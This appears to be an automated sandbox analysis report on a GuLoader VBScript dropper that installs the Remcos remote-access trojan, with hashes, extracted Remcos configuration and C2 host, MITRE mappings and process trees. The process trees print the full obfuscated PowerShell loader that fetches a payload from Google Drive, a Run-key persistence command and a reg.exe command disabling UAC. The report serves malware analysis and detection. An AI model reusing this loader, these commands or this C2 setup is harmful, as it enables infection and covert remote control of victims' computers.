guloader | 12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88

Analysis

max time kernel
146s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
28-03-2024 02:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88.vbs
Size

178KB
MD5

06d3e336e95c18b592b1a1cb0effe645
SHA1

987cc6db7c8d0137c5b4170bee730639fdafe5b5
SHA256

12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88
SHA512

8cd8dd907cee5e9ed928f38599659ec21c1b6c3797ac31f0140f788f0cb7a03dbd625fa6842f6ab200e6cf37d5db670c00fef57acf1b402b0cc117c82b60169b
SSDEEP

3072:XPvtrVR7t/zhP5AbvMZoxnRcRKKh14t8EIuvQcVi1l8ok/1fyLbvj/3s0oV++hyx:/vdVR7tLhxAbvMZoxnRcsK3M8EIOQcVg

Score

10^/10

guloader remcos remotehost downloader evasion persistence rat trojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

a458386d9.duckdns.org:3256

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
true
hide_keylog_file
false
install_flag
true
keylog_crypt
true
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-KQ00DZ
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1548.002

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Processes:

reg.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/5104-313-0x0000000001260000-0x00000000024B4000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM

Blocklisted process makes network request 1 IoCs

Processes:

WScript.exe

flow pid process

6 4492 WScript.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation WScript.exe
Executes dropped EXE 1 IoCs

Processes:

remcos.exe

pid process

4232 remcos.exe

flow	pid	process
6	4492	WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation	WScript.exe

pid	process
4232	remcos.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exewab.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Biotron = "%Habilitcar% -w 1 $Assaults=(Get-ItemProperty -Path 'HKCU:\\kostbare\\').Storbyer;%Habilitcar% ($Assaults)"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Rmc-KQ00DZ = "\"C:\\ProgramData\\Remcos\\remcos.exe\""	wab.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Rmc-KQ00DZ = "\"C:\\ProgramData\\Remcos\\remcos.exe\""	wab.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

22 drive.google.com
23 drive.google.com
49 drive.google.com
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs

Processes:

wab.exe

pid process

5104 wab.exe
5104 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

540 powershell.exe
5104 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 540 set thread context of 5104 540 powershell.exe wab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	ioc
22	drive.google.com
23	drive.google.com
49	drive.google.com

pid	process
5104	wab.exe
5104	wab.exe

pid	process
540	powershell.exe
5104	wab.exe

description	pid	process	target process
PID 540 set thread context of 5104	540	powershell.exe	wab.exe

Modifies registry class 2 IoCs

Processes:

wab.exeremcos.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	wab.exe
Key created	\REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings	remcos.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exe

pid process

2180 reg.exe
1516 reg.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

powershell.exepowershell.exe

pid process

2412 powershell.exe
2412 powershell.exe
540 powershell.exe
540 powershell.exe
540 powershell.exe
540 powershell.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

540 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 2412 powershell.exe
Token: SeDebugPrivilege 540 powershell.exe

pid	process
2180	reg.exe
1516	reg.exe

pid	process
2412	powershell.exe
2412	powershell.exe
540	powershell.exe
540	powershell.exe
540	powershell.exe
540	powershell.exe

pid	process
540	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2412	powershell.exe
Token: SeDebugPrivilege	540	powershell.exe

Suspicious use of WriteProcessMemory 30 IoCs

Processes:

WScript.exepowershell.exepowershell.exewab.execmd.execmd.exe

description	pid	process	target process
PID 4492 wrote to memory of 2412	4492	WScript.exe	powershell.exe
PID 4492 wrote to memory of 2412	4492	WScript.exe	powershell.exe
PID 2412 wrote to memory of 4760	2412	powershell.exe	cmd.exe
PID 2412 wrote to memory of 4760	2412	powershell.exe	cmd.exe
PID 2412 wrote to memory of 540	2412	powershell.exe	powershell.exe
PID 2412 wrote to memory of 540	2412	powershell.exe	powershell.exe
PID 2412 wrote to memory of 540	2412	powershell.exe	powershell.exe
PID 540 wrote to memory of 3584	540	powershell.exe	cmd.exe
PID 540 wrote to memory of 3584	540	powershell.exe	cmd.exe
PID 540 wrote to memory of 3584	540	powershell.exe	cmd.exe
PID 540 wrote to memory of 5104	540	powershell.exe	wab.exe
PID 540 wrote to memory of 5104	540	powershell.exe	wab.exe
PID 540 wrote to memory of 5104	540	powershell.exe	wab.exe
PID 540 wrote to memory of 5104	540	powershell.exe	wab.exe
PID 540 wrote to memory of 5104	540	powershell.exe	wab.exe
PID 5104 wrote to memory of 1360	5104	wab.exe	cmd.exe
PID 5104 wrote to memory of 1360	5104	wab.exe	cmd.exe
PID 5104 wrote to memory of 1360	5104	wab.exe	cmd.exe
PID 1360 wrote to memory of 2180	1360	cmd.exe	reg.exe
PID 1360 wrote to memory of 2180	1360	cmd.exe	reg.exe
PID 1360 wrote to memory of 2180	1360	cmd.exe	reg.exe
PID 5104 wrote to memory of 3164	5104	wab.exe	cmd.exe
PID 5104 wrote to memory of 3164	5104	wab.exe	cmd.exe
PID 5104 wrote to memory of 3164	5104	wab.exe	cmd.exe
PID 5104 wrote to memory of 4232	5104	wab.exe	remcos.exe
PID 5104 wrote to memory of 4232	5104	wab.exe	remcos.exe
PID 5104 wrote to memory of 4232	5104	wab.exe	remcos.exe
PID 3164 wrote to memory of 1516	3164	cmd.exe	reg.exe
PID 3164 wrote to memory of 1516	3164	cmd.exe	reg.exe
PID 3164 wrote to memory of 1516	3164	cmd.exe	reg.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\12f5b4bda44c7e6efdaa1c0d03e9b17e2779d55ced523a2d36054b68ad4d7d88.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4492

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Thoraxkirurgiernes Aftgtsfolks Paracenteses melancholious Cellarets Samhrets #>;$Angami=(cmd /c set /A 115^^0);Function Causa ([String]$Direktionernes){$Angami=[char][int]$Angami;$Addys=$Angami+'ubstring';$Ungentilize=8;$madannoncens=Poret($Direktionernes);For($Koppite88=7; $Koppite88 -lt $madannoncens; $Koppite88+=$Ungentilize){$Tripartitely=$Direktionernes.$Addys.Invoke($Koppite88, 1);$Noup=$Noup+$Tripartitely;}$Noup;}function Arabs ($Relapses){. ($Chuckstone) ($Relapses);}function Poret ([String]$Meningocortical119){$Springfjederens=$Meningocortical119.Length-1;$Springfjederens;}$Forkortelsestegnenes=Causa 'DatablaTtalarerr Indorda Ratoonn paastas Munkesf KemikaeElatrrerProca br UnpensiHalometn U,dispgFireper ';$Brepillen=Causa 'SneboldhseksualtDechlogtBureaukpKhalkhas Fluvia: Ch,mro/Undertr/LilsesfdSek.ionr ArbejdiIrri.atv UniniteGigante.OverfldgPresumioDivalenoVikarbugCoppicelPlatforeBostan,.merc,ricTrappouoWordboom Audiom/Bevikleu KapacicHandl,f?Elas.ane.onarkixHuswifepFriereso Astonir DoomedtCoxswai= ithraidStvlepaoLyksal,wcabassonRespreal Discomo.ulveriaA loidedFantasi& .edempiRestadsdSicki.e=Sesquiq1 pkstenICruellej Erare,WUnzippig UnbittpPrefabrqhearthmD SvanshETransluEBerobedbLynto,e9AbbedurNStikninNVaabens1Blodfyl9 SkalmuF Vikingb SentimrAtmolysSBa.skrm7UnsavaguN zimcyv BetrayeFur elooI,strokpSlnggretc,rabin7 NekroslKata.ogoFingerfrByrdernaPrinci Jchefgru ';$Chuckstone=Causa 'Udsvejfi SelenaeTogfre.x Quadri ';$Varetagelses=Causa 'Ineffab$LeilapogGlucicil Womanio,jointtb emarkaShipp rlGymnost:rethi,kOPitf,enrDecretugTr.ikasa efleknepidendoGillnetg Gesticr Toldstaquadripptorso,ehQuamocli Ekstemc TerrifaFichu tlOph els1 J,teli4 Releva6omflytn Des,ert= Skamfu MaskereS BlodtrtNeddmpnaOxidizarJudiciotSerabud-StoftilBVej.ogeiBitingitInadviss onnatiTSwi.hvirCymblenaWi lfulnsupersisCobwebsfGe,rmaneV.ndensrHenotic Armariu-CindasaSpacedkaoTvangsfuBesudlirA anthocVibr,oneMontada Me,allo$Hexo,esBDiskeder Uud aleservicep Po,gneiunactinlC,loricl Knledse Gri tinBespndp uhjlpel-PastosoDAndri,eeIndhe tsevolvertUnmuddei LillejnFusionsaTyndskit PreacuiKaffebnoO ganisnStormha saltomo$ GuttleP ForfeirP.ogramoUindbu.wStand.rlAdi.phoehyttefarB.tnkni ';Arabs (Causa 'Indekso$DetachegMu.ilagl Pasto oNecrogrb Stup,daN,pponelMaioide:.torherP MttederNonmorto Bronkiw eutrallJowl.koe InterfrPowerl,= Raderk$ ,celike Ove emnSindbilv So fan: umbersaWhoopeepDelstatp churchdFri.idsa Notarit SammenaUnyield ') ;Arabs (Causa 'Dda,yogI BilledmHjemvispKittenloUnsha irFla.ellt odelre-C.unterMArrive,oBrevbakdTussensuCirculalUnbro ce Jenvip DidelpBButikshi Eu roptPetrolssUnliablT E pundrCurli wacirkulrn.hirkahsUnjew,lfHemiseceKorrigerSuck,in ') ;$Prowler=$Prowler+'\underbemanding.Bip' ;Arabs (Causa 'Verdens$ Luftp.g FejlbelRescruto salgspbBaandetaHaratchlSvrmeri: FlgeskKMilieuaaAfpropnrMaddersr.eshroui Elg.itg OverwieElatrersIndivid=Precomp(SingulaTMaes eaeForrardsReana ytSidless- Bed wiPMniumdea Hogtiet M terdhBefritr Revers,$ suziprPEuph rbrGgerskyoAltabolwProctorlDosadhcebug.edtrSvnerve)Fam.lie ') ;while (-not $Karriges) {Arabs (Causa 'TekstkoICreakerfSstjern Skolin( Trem e$ Carom,OtypifierGgesto.g UnloosaOrthogrnstormnsoHusmandg Moms,rr Fljls.aDistinkpAnthr phJgerkori BagborcFire,arastan,ofl D adsm1Frugali4 Yaquin6 Bypath.ForconcJR,psodioHv,dtnibKrikkerSHerringt andebaPersh ntForur,teag.atra Ekspatr-LoculeseK,rrektqEnseelr Mixnov$FormumnFButsnudo AedoeorYe lowsk loserno kostumrEpiskoptNokken.eNixelivlForne msDonercaeO,havsmsprobanktReall geHom,eoagGraphemn FoetureOps ramnSlitsabe AftalesPrsente)Hjulerk Totalsa{IndhentSLynasunt pearera LycantrLi retttSpec la-UnoverlSAffilielEv ngeleSomme.he Jen enpBlyant, Knappi.1Ventril} Vrks eeTrolde.l MichersDichocae Kava.i{SkridtmS TheomotUddf,ruaA,aforerEnviront P,einv-RvertogS LegisllErektioechartuleScowedkpSvikmll Encanth1S ccula;Coddl,pAKrydsenrColonisaclippinb Baskerspentahe Bas.ard$Laba enVStreptoa CloggirVaageble M.onshtDecimataStvnerngStraff,eA.teryxlF.astensBogstaveMosteresTurpent}a tract ');Arabs (Causa 'Sofabo.$ IsnenbgMerchanlAfpresso BibliobMatrikla BortlelPolygon:Pennep,K Dichl,aUninnatrTim,budrnrmest iAbsurdigHovedore VankelsTypeenh=Archich(Pe,letiTGenfreme RewagesRkkevistErektiv- stednaPestabliaRes.rvetSamsendhIllu iv Energi$UnenchaPNyfigenrUanmeldoSmugtrnwIndvilglStrandre FornemrO.arioa)Arb jds ') ;}Arabs (Causa 'Monopol$ legikegSyddi nlFilurchohenstilbRupiebiaPandurol Suppor:SegmentA uforsknB,nehavs BevillkBaandlgu Gynaeo yrende= Jy lan DickensG P,evereIn,rojetUnderst-Jolte sCEntolomoAvis,mrnme,ingst UnusuaeOusocianAsymptot Tender Guardsm$Bri,adePAmbosexrBeskftioGourma.wSten,orl ForplieVe,ustarRepetit ');Arabs (Causa 'Begrets$Fleks igOvertegl AppleooTangsnab Unemola estysclF.rsrge: WaitstrBri klaeFyrstedgRe igernHa lequsFilibuskSutherpa Moch,abbemyndisUvsensif Aversir.aniteteAnt,cerlKolonibsHemo hieDistrea Sortlyf=Epistel Flavoro[ AlinerSKabassoyBeramm,sErumpent Loren eBorerigmToldpap.KapselaCThorougoJapanninVolunt.vInosculeStj.mper.orksgetAl,erie]Wristie: Udend :UbegaveFSig.alsrBehandoo Probl mOverfl B CirculaCoifsovs dudisheOver.as6Kkkenbo4 E plicSensfarvtOverprortilhrigiTopl,nsn LsterngStethok(Kaf esl$AstfiguA Forv nn FrissosPantarbkOversigupoolert)Unguicu ');Arabs (Causa 'utmm,li$ hrysogoutdazzlDirkedvoAnas asb A tritataffelml A.tist:imdegaaHSlotsafoEns.form Bor.kreHildethrNationaiUnreversRaaoliekNetleafePulveresUnangel Washd y=Forund. Lengthi[Ud.idelSStepniny Sol.risAfsnitstBevil.iePancreamGruppen.Taiwa sTNonulceeKringlex Electrt Ndtele.LoaneraE ibsonsnsennasecDatovekoBrefr kd HyldebiLyasesen Boas,egHaruspi]Botanic:Dries a:Imp icaAPhysic.SElektroCPurchasIconge,eIExhi,it.featureGVagtpareJ.ttingtVindbjtSRibworttCremo,ir Nal esiMed.rlincocktaigTele,ec(Calycin$,useudsrstr,etmeperigyngTilkrsenToxinemsFormuefkve,forsapelorizb Shoppes.arthecfSucuriurSussiese mar.ellXylogras Optakte Dishar)Recipie ');Arabs (Causa ' Skoleu$Fristadg Bos.erlBen,ofloEc,ucarbWidowsua.takittlSgraf.i:Kitten,ASt.atitnB llacetHelmstae wayaocpSvangstaPr,filbsUbe,mykcCr.tchihT rakihaTransmilKono,is=agters $Umo somH ProptroEftermim Spa keeOutgro rIntersti orfaldsombrin.kUnexpedeEdgemarsBadiner.G,velmas tilretuCalpackbFladlusseksercetTadio,rr O tsnoi Dominan DeviatgOversta(spytkrl3Vind,rv1C.rrida6Omniton5aethel.2Sexmisb5Antipr ,Fibroma3Nippit.2Afsynge1M nxman0rr.edni7Gullasc)Firebox ');Arabs $Antepaschal;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2412

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
3⤵
PID:4760

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Thoraxkirurgiernes Aftgtsfolks Paracenteses melancholious Cellarets Samhrets #>;$Angami=(cmd /c set /A 115^^0);Function Causa ([String]$Direktionernes){$Angami=[char][int]$Angami;$Addys=$Angami+'ubstring';$Ungentilize=8;$madannoncens=Poret($Direktionernes);For($Koppite88=7; $Koppite88 -lt $madannoncens; $Koppite88+=$Ungentilize){$Tripartitely=$Direktionernes.$Addys.Invoke($Koppite88, 1);$Noup=$Noup+$Tripartitely;}$Noup;}function Arabs ($Relapses){. ($Chuckstone) ($Relapses);}function Poret ([String]$Meningocortical119){$Springfjederens=$Meningocortical119.Length-1;$Springfjederens;}$Forkortelsestegnenes=Causa 'DatablaTtalarerr Indorda Ratoonn paastas Munkesf KemikaeElatrrerProca br UnpensiHalometn U,dispgFireper ';$Brepillen=Causa 'SneboldhseksualtDechlogtBureaukpKhalkhas Fluvia: Ch,mro/Undertr/LilsesfdSek.ionr ArbejdiIrri.atv UniniteGigante.OverfldgPresumioDivalenoVikarbugCoppicelPlatforeBostan,.merc,ricTrappouoWordboom Audiom/Bevikleu KapacicHandl,f?Elas.ane.onarkixHuswifepFriereso Astonir DoomedtCoxswai= ithraidStvlepaoLyksal,wcabassonRespreal Discomo.ulveriaA loidedFantasi& .edempiRestadsdSicki.e=Sesquiq1 pkstenICruellej Erare,WUnzippig UnbittpPrefabrqhearthmD SvanshETransluEBerobedbLynto,e9AbbedurNStikninNVaabens1Blodfyl9 SkalmuF Vikingb SentimrAtmolysSBa.skrm7UnsavaguN zimcyv BetrayeFur elooI,strokpSlnggretc,rabin7 NekroslKata.ogoFingerfrByrdernaPrinci Jchefgru ';$Chuckstone=Causa 'Udsvejfi SelenaeTogfre.x Quadri ';$Varetagelses=Causa 'Ineffab$LeilapogGlucicil Womanio,jointtb emarkaShipp rlGymnost:rethi,kOPitf,enrDecretugTr.ikasa efleknepidendoGillnetg Gesticr Toldstaquadripptorso,ehQuamocli Ekstemc TerrifaFichu tlOph els1 J,teli4 Releva6omflytn Des,ert= Skamfu MaskereS BlodtrtNeddmpnaOxidizarJudiciotSerabud-StoftilBVej.ogeiBitingitInadviss onnatiTSwi.hvirCymblenaWi lfulnsupersisCobwebsfGe,rmaneV.ndensrHenotic Armariu-CindasaSpacedkaoTvangsfuBesudlirA anthocVibr,oneMontada Me,allo$Hexo,esBDiskeder Uud aleservicep Po,gneiunactinlC,loricl Knledse Gri tinBespndp uhjlpel-PastosoDAndri,eeIndhe tsevolvertUnmuddei LillejnFusionsaTyndskit PreacuiKaffebnoO ganisnStormha saltomo$ GuttleP ForfeirP.ogramoUindbu.wStand.rlAdi.phoehyttefarB.tnkni ';Arabs (Causa 'Indekso$DetachegMu.ilagl Pasto oNecrogrb Stup,daN,pponelMaioide:.torherP MttederNonmorto Bronkiw eutrallJowl.koe InterfrPowerl,= Raderk$ ,celike Ove emnSindbilv So fan: umbersaWhoopeepDelstatp churchdFri.idsa Notarit SammenaUnyield ') ;Arabs (Causa 'Dda,yogI BilledmHjemvispKittenloUnsha irFla.ellt odelre-C.unterMArrive,oBrevbakdTussensuCirculalUnbro ce Jenvip DidelpBButikshi Eu roptPetrolssUnliablT E pundrCurli wacirkulrn.hirkahsUnjew,lfHemiseceKorrigerSuck,in ') ;$Prowler=$Prowler+'\underbemanding.Bip' ;Arabs (Causa 'Verdens$ Luftp.g FejlbelRescruto salgspbBaandetaHaratchlSvrmeri: FlgeskKMilieuaaAfpropnrMaddersr.eshroui Elg.itg OverwieElatrersIndivid=Precomp(SingulaTMaes eaeForrardsReana ytSidless- Bed wiPMniumdea Hogtiet M terdhBefritr Revers,$ suziprPEuph rbrGgerskyoAltabolwProctorlDosadhcebug.edtrSvnerve)Fam.lie ') ;while (-not $Karriges) {Arabs (Causa 'TekstkoICreakerfSstjern Skolin( Trem e$ Carom,OtypifierGgesto.g UnloosaOrthogrnstormnsoHusmandg Moms,rr Fljls.aDistinkpAnthr phJgerkori BagborcFire,arastan,ofl D adsm1Frugali4 Yaquin6 Bypath.ForconcJR,psodioHv,dtnibKrikkerSHerringt andebaPersh ntForur,teag.atra Ekspatr-LoculeseK,rrektqEnseelr Mixnov$FormumnFButsnudo AedoeorYe lowsk loserno kostumrEpiskoptNokken.eNixelivlForne msDonercaeO,havsmsprobanktReall geHom,eoagGraphemn FoetureOps ramnSlitsabe AftalesPrsente)Hjulerk Totalsa{IndhentSLynasunt pearera LycantrLi retttSpec la-UnoverlSAffilielEv ngeleSomme.he Jen enpBlyant, Knappi.1Ventril} Vrks eeTrolde.l MichersDichocae Kava.i{SkridtmS TheomotUddf,ruaA,aforerEnviront P,einv-RvertogS LegisllErektioechartuleScowedkpSvikmll Encanth1S ccula;Coddl,pAKrydsenrColonisaclippinb Baskerspentahe Bas.ard$Laba enVStreptoa CloggirVaageble M.onshtDecimataStvnerngStraff,eA.teryxlF.astensBogstaveMosteresTurpent}a tract ');Arabs (Causa 'Sofabo.$ IsnenbgMerchanlAfpresso BibliobMatrikla BortlelPolygon:Pennep,K Dichl,aUninnatrTim,budrnrmest iAbsurdigHovedore VankelsTypeenh=Archich(Pe,letiTGenfreme RewagesRkkevistErektiv- stednaPestabliaRes.rvetSamsendhIllu iv Energi$UnenchaPNyfigenrUanmeldoSmugtrnwIndvilglStrandre FornemrO.arioa)Arb jds ') ;}Arabs (Causa 'Monopol$ legikegSyddi nlFilurchohenstilbRupiebiaPandurol Suppor:SegmentA uforsknB,nehavs BevillkBaandlgu Gynaeo yrende= Jy lan DickensG P,evereIn,rojetUnderst-Jolte sCEntolomoAvis,mrnme,ingst UnusuaeOusocianAsymptot Tender Guardsm$Bri,adePAmbosexrBeskftioGourma.wSten,orl ForplieVe,ustarRepetit ');Arabs (Causa 'Begrets$Fleks igOvertegl AppleooTangsnab Unemola estysclF.rsrge: WaitstrBri klaeFyrstedgRe igernHa lequsFilibuskSutherpa Moch,abbemyndisUvsensif Aversir.aniteteAnt,cerlKolonibsHemo hieDistrea Sortlyf=Epistel Flavoro[ AlinerSKabassoyBeramm,sErumpent Loren eBorerigmToldpap.KapselaCThorougoJapanninVolunt.vInosculeStj.mper.orksgetAl,erie]Wristie: Udend :UbegaveFSig.alsrBehandoo Probl mOverfl B CirculaCoifsovs dudisheOver.as6Kkkenbo4 E plicSensfarvtOverprortilhrigiTopl,nsn LsterngStethok(Kaf esl$AstfiguA Forv nn FrissosPantarbkOversigupoolert)Unguicu ');Arabs (Causa 'utmm,li$ hrysogoutdazzlDirkedvoAnas asb A tritataffelml A.tist:imdegaaHSlotsafoEns.form Bor.kreHildethrNationaiUnreversRaaoliekNetleafePulveresUnangel Washd y=Forund. Lengthi[Ud.idelSStepniny Sol.risAfsnitstBevil.iePancreamGruppen.Taiwa sTNonulceeKringlex Electrt Ndtele.LoaneraE ibsonsnsennasecDatovekoBrefr kd HyldebiLyasesen Boas,egHaruspi]Botanic:Dries a:Imp icaAPhysic.SElektroCPurchasIconge,eIExhi,it.featureGVagtpareJ.ttingtVindbjtSRibworttCremo,ir Nal esiMed.rlincocktaigTele,ec(Calycin$,useudsrstr,etmeperigyngTilkrsenToxinemsFormuefkve,forsapelorizb Shoppes.arthecfSucuriurSussiese mar.ellXylogras Optakte Dishar)Recipie ');Arabs (Causa ' Skoleu$Fristadg Bos.erlBen,ofloEc,ucarbWidowsua.takittlSgraf.i:Kitten,ASt.atitnB llacetHelmstae wayaocpSvangstaPr,filbsUbe,mykcCr.tchihT rakihaTransmilKono,is=agters $Umo somH ProptroEftermim Spa keeOutgro rIntersti orfaldsombrin.kUnexpedeEdgemarsBadiner.G,velmas tilretuCalpackbFladlusseksercetTadio,rr O tsnoi Dominan DeviatgOversta(spytkrl3Vind,rv1C.rrida6Omniton5aethel.2Sexmisb5Antipr ,Fibroma3Nippit.2Afsynge1M nxman0rr.edni7Gullasc)Firebox ');Arabs $Antepaschal;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:540

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
4⤵
PID:3584

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Adds Run key to start application
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:5104

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Biotron" /t REG_EXPAND_SZ /d "%Habilitcar% -w 1 $Assaults=(Get-ItemProperty -Path 'HKCU:\kostbare\').Storbyer;%Habilitcar% ($Assaults)"
5⤵
- Suspicious use of WriteProcessMemory
PID:1360

C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Biotron" /t REG_EXPAND_SZ /d "%Habilitcar% -w 1 $Assaults=(Get-ItemProperty -Path 'HKCU:\kostbare\').Storbyer;%Habilitcar% ($Assaults)"
6⤵
- Adds Run key to start application
- Modifies registry key
PID:2180

C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
5⤵
- Suspicious use of WriteProcessMemory
PID:3164

C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
6⤵
- UAC bypass
- Modifies registry key
PID:1516

C:\ProgramData\Remcos\remcos.exe
"C:\ProgramData\Remcos\remcos.exe"
5⤵
- Executes dropped EXE
- Modifies registry class
PID:4232

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3176

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Remcos\remcos.exe

Filesize
504KB

MD5
251e51e2fedce8bb82763d39d631ef89

SHA1
677a3566789d4da5459a1ecd01a297c261a133a2

SHA256
2682086ace1970d5573f971669591b731f87d749406927bd7a7a4b58c3c662e9

SHA512
3b49e6d9197b12ca7aa282707d62496d9feac32b3f6fd15affd4eaaa5239da903fadd4600a1d17a45ec330a590fc86218c9a7dc20306b52d8170e04b0e325521

Download Submit
C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

Filesize
5KB

MD5
ce31aad931645728cb11543a9cd80f8e

SHA1
3e04faa0eebb25e42df967a276d3ce916947adf9

SHA256
5e765d9805803b5190ecf3cb07505d8ddc2b45645240c0ce905ecbda3e46ab06

SHA512
07e2f610945bac67ded6f43b0422295fe5803aeb91b6e4208350bb197f27ee73340462969917e883e3a3aac60a34eb5c779802d9223b04b11010e761c198e5e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

Filesize
3KB

MD5
0ba3f0fb7f22ed631bc2d704810afdb6

SHA1
160465127007737cb73903e8967bb9c545bd9c5e

SHA256
c38e09ab888c21242d8a7eaa4e1a1f378a8beae8f5b362a01595b06487f6a97b

SHA512
cda5c288d26eeade294a979cb3d3509175091539ffa822431d9e8fd5f185caa28aaf0c6de1afa173cabe5864b0b2ffdb122d88555f00f654683cb6fc2788ff66

Download Submit
C:\Users\Admin\AppData\Local\Temp\Gneiss.txt

Filesize
824B

MD5
3bb192572878028a805ba6cbb1c46538

SHA1
883d9e6730b0288d09742546aa64e0dc5ba6ab26

SHA256
